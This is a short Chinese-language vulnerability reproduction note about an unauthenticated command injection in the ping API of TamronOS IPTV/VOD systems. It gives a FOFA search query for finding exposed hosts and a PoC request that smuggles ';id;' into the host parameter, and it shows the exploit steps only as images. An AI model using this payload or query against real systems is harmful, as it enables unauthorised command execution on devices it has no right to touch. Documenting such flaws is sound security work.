TamronOS IPTV系统存在前台命令执行漏洞.md

1.07 KB / 2021-07-15 20:04:58
    ## TamronOS IPTV系统存在前台命令执行漏洞

## 漏洞描述

TamronOS IPTV/VOD系统是一套基于Linux内核开发的宽带运营商、酒店、学校直播点播一体解决方案，系统提供了多种客户端（Android机顶盒、电视、PC版点播、手机版点播）方便用户通过不同的设备接入。由于未对ping接口进行限制，造成了命令执行漏洞。并且可以前台命令执行

## 漏洞影响

> TamronOS IPTV 所有版本

## FOFA

> title="TamronOS IPTV系统"

## 复现

1）登录界面

![1](/resource/TamronOS-IPTV系统任意用户添加修改/1.jpg)

2）POC如下：

```
 /api/ping?count=5&host=;id;&port=80&source=1.1.1.1&type=icmp
```

![2](/resource/TamronOS-IPTV系统前台命令执行/2.png)

![3](/resource/TamronOS-IPTV系统前台命令执行/3.png)

3) EXP如下：

![4](/resource/TamronOS-IPTV系统前台命令执行/4.png)

 然后利用POC去前台(未登录状态)尝试进行命令执行：

![5](/resource/TamronOS-IPTV系统前台命令执行/5.png)

上图为没有cookie的未登录状态进行命令执行。